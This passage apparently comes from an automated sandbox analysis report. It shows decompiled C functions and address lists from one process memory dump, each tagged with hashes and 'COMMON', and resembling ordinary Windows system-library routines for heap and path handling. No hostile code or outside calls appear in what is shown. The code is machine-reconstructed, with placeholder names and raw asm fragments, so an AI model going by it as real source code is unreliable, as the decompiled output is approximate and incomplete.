0x01016cf2
0x01016cf2
0x01016ce0
0x00fd4e3f
0x00fd4e41
0x00fd4e51
0x00fd4e51
0x00fd4e03
0x00fd4e03
0x00fd4e09
0x00fd4e0f
0x00fd4e57
0x00000000
0x00000000
0x00fd4e1b
0x00fd4e30
0x00fd4e5b
0x00fd4e5b
0x00000000
0x00fd4e30
0x00fd4e11
0x00fd4e11
0x00fd4e16
0x00000000
0x00fd4e16
0x00fd4e01
0x00000000
0x00fd4e01
0x00fd4da5
0x01016c6b
0x00000000
0x00fd4dab
0x00fd4dab
0x00000000
0x00fd4dab

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 777db65a2d117503a512d2f81c1a9b48f7adb49fa22d1f5d248e8190771e6d3c
Instruction ID: 038dbfd92667704124a5ab276a70d6981e9848233a6a51e91a8de443ae603cc3
Opcode Fuzzy Hash: 777db65a2d117503a512d2f81c1a9b48f7adb49fa22d1f5d248e8190771e6d3c
Instruction Fuzzy Hash: 3041F571A40358AFEB31DF14CC81F66B7AAFB44710F0400AAE9459B381D779ED40EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FB8A0A, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00FB8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x109d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E00FEB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E00FBE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0xf81180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E00FD1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E00FE3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E00FB8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x00fb8a0a
0x00fb8a1c
0x00fb8a23
0x00fb8a2e
0x00fb8a30
0x00fb8a36
0x00fb8a3c
0x00fb8a3e
0x00fb8a4a
0x00fb8a52
0x00fb8a9c
0x00fb8aae
0x00fb8a58
0x00fb8a5e
0x00fb8a6a
0x00fb8a6f
0x00fb8a75
0x00fb8a7d
0x00fb8a85
0x00fb8a86
0x00fb8a89
0x00fb8a93
0x00fb8a99
0x00fb8a9b
0x00000000
0x00fb8aaf
0x00fb8abe
0x00fb8ac3
0x00fb8acb
0x00fb8ad7
0x00fb8ae0
0x00fb8af1
0x00000000
0x00fb8af1
0x00fb8acd
0x00fb8ad5
0x00fb8afb
0x00fb8afd
0x00fb8aff
0x00fb8b07
0x00fb8b22
0x00fb8b24
0x00fb8b2a
0x00fb8b2e
0x00fb8b3f
0x00fb8b78
0x00fb8b41
0x00fb8b52
0x00fb8b54
0x00fb8b5c
0x00fb8b74
0x00fb8b74
0x00fb8b5c
0x00fb8b3f
0x00fb8b5e
0x00fb8b61
0x00fb8b64
0x00fb8b64
0x00fb8b6c
0x00fb8b6c
0x00fb8b11
0x01009cd5
0x01009cd5
0x00fb8b17
0x00fb8b1a
0x00fb8b1a
0x00000000
0x00fb8ad5
0x00fb8a89

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec8c78afb41f6001d6e82307a896c65faee7ae6ce063f97eb3c7f53d02196f90
Instruction ID: c2bb9e8438dfad622c97017432aff4af4eddc267b46500fcc982d4cf639f25fa
Opcode Fuzzy Hash: ec8c78afb41f6001d6e82307a896c65faee7ae6ce063f97eb3c7f53d02196f90
Instruction Fuzzy Hash: AC4160B1A4022C9BDB24DF26CC88AE9B7BCFB94350F1041EAD81997252DB749E81DF50

Uniqueness

Uniqueness Score: -1.00%

Function 0106AA16, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0106AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0106ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0106AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E0106AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0104CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L00FC77F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E00FC7D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0106131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0104CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}

0x0106aa1f
0x0106aa21
0x0106aa23
0x0106aa2b
0x0106aa30
0x0106aa36
0x0106aa39
0x0106aa42
0x0106aa75
0x0106aa7a
0x0106aa7c
0x0106aa7c
0x0106aa88
0x0106aa8a
0x0106aa8f
0x0106ab02
0x0106ab04
0x0106aa99
0x0106aaa8
0x0106aaaf
0x0106aab3
0x0106aacc
0x0106aad1
0x0106aad6
0x0106aae0
0x0106aaf3
0x0106aaf9
0x0106aafe
0x0106aafe
0x0106aaf3
0x0106aad6
0x0106aab3
0x0106ab07
0x0106ab0a
0x0106ab11
0x0106ab23
0x0106ab13
0x0106ab1c
0x0106ab1c
0x0106ab2b
0x0106ab44
0x0106ab44
0x0106ab51
0x0106ab51
0x0106aa44
0x0106aa47
0x0106aa4c
0x00000000
0x00000000
0x0106aa5a
0x0106aa64
0x0106aa72
0x00000000
0x0106aa66
0x0106aa66
0x0106aa68
0x0106aa6a
0x00000000
0x0106aa6a

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction ID: 1714eb6e1ea46da22b66a9d9c7c983c64410f898ab719b5cde565d4337661b52
Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction Fuzzy Hash: E031E631F00245ABEB15AB69CD45BBFFBBEDF84210F0584A9E985B7252DB74DD00C650

Uniqueness

Uniqueness Score: -1.00%

Function 0106FDE2, Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0106FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0106FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E01070A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E00FC7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E01061608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E01072B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0106C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0106DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E00FC7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0106A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x0106fde7
0x0106fde8
0x0106fdec
0x0106fdee
0x0106fdf5
0x0106fdf7
0x0106fdfc
0x0106fe19
0x0106fe22
0x0106fe26
0x0106fec6
0x0106fecd
0x0106fed5
0x0106fee7
0x0106fed7
0x0106fee0
0x0106fee0
0x0106feef
0x0106ff00
0x0106ff02
0x0106ff07
0x0106ff07
0x00000000
0x0106feef
0x0106fe33
0x0106fe55
0x0106fe59
0x0106fe5b
0x0106fe5e
0x0106fe69
0x0106fe6d
0x0106fe6d
0x0106fe69
0x0106fe35
0x0106fe41
0x0106fe41
0x0106fe79
0x0106fe8b
0x0106fe7b
0x0106fe84
0x0106fe84
0x0106fe93
0x00000000
0x0106fea8
0x0106feba
0x00000000
0x0106feba
0x0106fdfe
0x0106fe01
0x0106fe02
0x0106fe08
0x0106ff0c
0x0106ff14
0x0106ff14

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: 757a4118f18f74fc121aa54c77ca01f2b2829173de55ecde6bb769919ada6b4d
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: 6E310332700642AFD3629B68DC65F6ABFEEEF85750F184098E9C68B342DA74DC41C760

Uniqueness

Uniqueness Score: -1.00%

Function 0106EA55, Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0106EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E00FC2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0106E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E00FAF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E00FBFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0106AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0106BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E00FC7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0105FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E00FBFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0106A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x0106ea55
0x0106ea66
0x0106ea68
0x0106ea6c
0x0106ea6f
0x0106ea72
0x0106ea75
0x0106ea7a
0x0106ea7a
0x0106ea7e
0x0106ea80
0x0106ea85
0x0106ea8b
0x0106eab5
0x0106eabc
0x0106eabf
0x0106eabf
0x0106eaca
0x0106eace
0x0106ead0
0x0106eae4
0x0106eaeb
0x0106eaf0
0x0106eaf5
0x0106eb09
0x0106eb0d
0x0106eb1d
0x0106eb2d
0x0106eb38
0x0106eb3d
0x0106eb41
0x0106eb4a
0x0106eb60
0x0106eb4c
0x0106eb52
0x0106eb59
0x0106eb59
0x0106eb68
0x0106eb71
0x0106eb71
0x0106ea8d
0x0106ea8f
0x0106ea92
0x0106ea97
0x0106ea97
0x0106ea9b
0x0106ea9c
0x0106ea9e
0x0106eaa6
0x0106eaa6
0x0106eb7e

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: 05c0f7dea3a92ac3ee5c4fe7eb3e1b306d4c87ccd4887de4101261752bb43d63
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: 753190766047069BC719DF28CC81AABB7E9FFC4310F044A2DF59687645EA34E809CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 010269A6, Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E010269A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x109d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L00FB6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E01026BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E00FE9980() >= 0) {
							E00FC2280(_t56, 0x1098778);
							_t77 = 1;
							_t68 = 1;
							if( *0x1098774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x1098774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E00FAB6F0(0xf8c338, 0xf8c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E00FE9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E00FE95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E00FBFFB0(_t68, _t77, 0x1098778);
				}
				_pop(_t78);
				return E00FEB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x010269b5
0x010269be
0x010269c3
0x010269c9
0x010269cc
0x010269d1
0x010269d3
0x010269de
0x010269e1
0x010269ea
0x010269f6
0x010269fe
0x01026a13
0x01026a14
0x01026a15
0x01026a16
0x01026a1e
0x01026a26
0x01026a31
0x01026a36
0x01026a37
0x01026a40
0x01026a49
0x01026a4a
0x01026a53
0x01026a59
0x01026a5d
0x01026a5e
0x01026a64
0x01026a67
0x01026a6a
0x01026a6d
0x01026a70
0x01026a77
0x01026a7d
0x01026a86
0x01026a89
0x01026a9c
0x01026a9f
0x01026aa2
0x01026aa5
0x01026aaf
0x01026ab1
0x01026ab8
0x01026ab9
0x01026abb
0x01026abe
0x01026ac5
0x01026ac5
0x01026aaf
0x01026a40
0x01026a26
0x010269fe
0x01026ace
0x01026ad0
0x01026ad3
0x01026ad8
0x01026adf
0x01026adf
0x01026ae8
0x01026aef
0x01026aef
0x01026af9
0x01026b06

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6edbe9c5960593acca7951fe60cd6f02f2ef633a0dab9e2c8bce9be8a737f8f5
Instruction ID: 766113be337465b27beef80ac135f5abeb1b03d09ae5d8b72c304f8ed20e1bf9
Opcode Fuzzy Hash: 6edbe9c5960593acca7951fe60cd6f02f2ef633a0dab9e2c8bce9be8a737f8f5
Instruction Fuzzy Hash: A54186B1D00218AFDB20DFAAC941BEEBBF8FF48304F04816AE955A7241DB769905DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00FA5210, Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00FA5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E00FA52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E00FE95D0();
							L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E00FBEB70(_t54, 0x10979a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E00FE95D0();
								L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E00FBEB70(_t54, 0x10979a0);
						}
						return _t52;
					}
					L5:
					_t33 = E00FEF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E00FBEB70(_t54, 0x10979a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E00FE95D0();
							L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x00fa5220
0x00fa5224
0x01000d13
0x01000d16
0x01000d19
0x00fa522a
0x00fa522a
0x00fa522d
0x00fa522d
0x00fa5231
0x00fa5235
0x00fa5239
0x01000d5c
0x01000d62
0x00000000
0x00000000
0x01000d6a
0x01000d7b
0x01000d7f
0x01000d81
0x01000d84
0x01000d95
0x01000d95
0x01000d6c
0x01000d71
0x01000d71
0x01000d9a
0x00000000
0x00fa524a
0x00fa524a
0x00fa5250
0x01000d24
0x01000d35
0x01000d39
0x01000d3b
0x01000d3e
0x01000d50
0x01000d50
0x01000d26
0x01000d2b
0x01000d2b
0x00000000
0x01000d55
0x00fa5256
0x00fa525b
0x00fa5265
0x01000da7
0x00fa526b
0x00fa526e
0x00fa5272
0x01000db1
0x01000db4
0x01000dc5
0x01000dc5
0x00fa5272
0x00fa5278
0x00fa527e
0x00fa528a
0x00fa528c
0x00fa528d
0x00000000
0x00fa5280
0x00fa5282
0x00fa5288
0x00fa529f
0x00fa5292
0x00000000
0x00fa5292
0x00000000
0x00fa5288
0x00fa527e

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35dd40dc9e4c11068f00c10adeede2a08b27cae87416074971dcaf32ea4db60f
Instruction ID: 0b42ac7da5af3ce8fbdecd054a18703b5fc78d7f120eaf8b688b112528591ac2
Opcode Fuzzy Hash: 35dd40dc9e4c11068f00c10adeede2a08b27cae87416074971dcaf32ea4db60f
Instruction Fuzzy Hash: 2C312A72251B00EBD727AB18CC42F6A77E5FF51B60F11461AF4950B1E5D770E800EAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FE3D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FE3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E00FB7B60(0, _t61, 0xf811c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E00FB7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						_t12 =  &(_t61[2]); // 0xfffbffa8
						 *((short*)( *_t12 + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L00FC4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x00fe3d4c
0x00fe3d50
0x00fe3d55
0x00fe3d5e
0x0101e79a
0x00000000
0x0101e79a
0x00fe3d68
0x0101e789
0x00fe3d9d
0x00fe3da3
0x00fe3daf
0x00fe3db5
0x00fe3dbc
0x00fe3dc4
0x00fe3dc9
0x00fe3dce
0x0101e7ae
0x0101e7ae
0x00fe3dd9
0x00fe3dde
0x00fe3de2
0x00fe3de7
0x00fe3e0d
0x00fe3e13
0x00fe3e16
0x00fe3e1e
0x00fe3e25
0x00fe3e28
0x00000000
0x00000000
0x00fe3e2a
0x00fe3e2f
0x00fe3e37
0x00fe3e37
0x00000000
0x00fe3e37
0x00fe3e31
0x00000000
0x00fe3e31
0x00fe3e20
0x00fe3e20
0x00fe3e35
0x00000000
0x00fe3de9
0x00fe3de9
0x00fe3de9
0x00fe3dee
0x00fe3dfd
0x00fe3dff
0x00fe3e02
0x00fe3e05
0x00fe3e05
0x00000000
0x00fe3df0
0x00fe3de7
0x0101e78f
0x0101e794
0x00fe3d79
0x00fe3d84
0x00fe3d89
0x00fe3d8e
0x00000000
0x0101e7a4
0x00fe3d96
0x00fe3d9a
0x00000000
0x00fe3d9a
0x00000000
0x0101e794
0x00fe3d6e
0x00fe3d73
0x00000000
0x0101e7b5
0x00000000

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcb959698891ea9ec31fb0ead1959284e8bffa911f9e6525691388aacb710e03
Instruction ID: 00873933276f91c886be6bfdfbfcd093bc2fee6bda60ee70fbaae1bd358b4dae
Opcode Fuzzy Hash: fcb959698891ea9ec31fb0ead1959284e8bffa911f9e6525691388aacb710e03
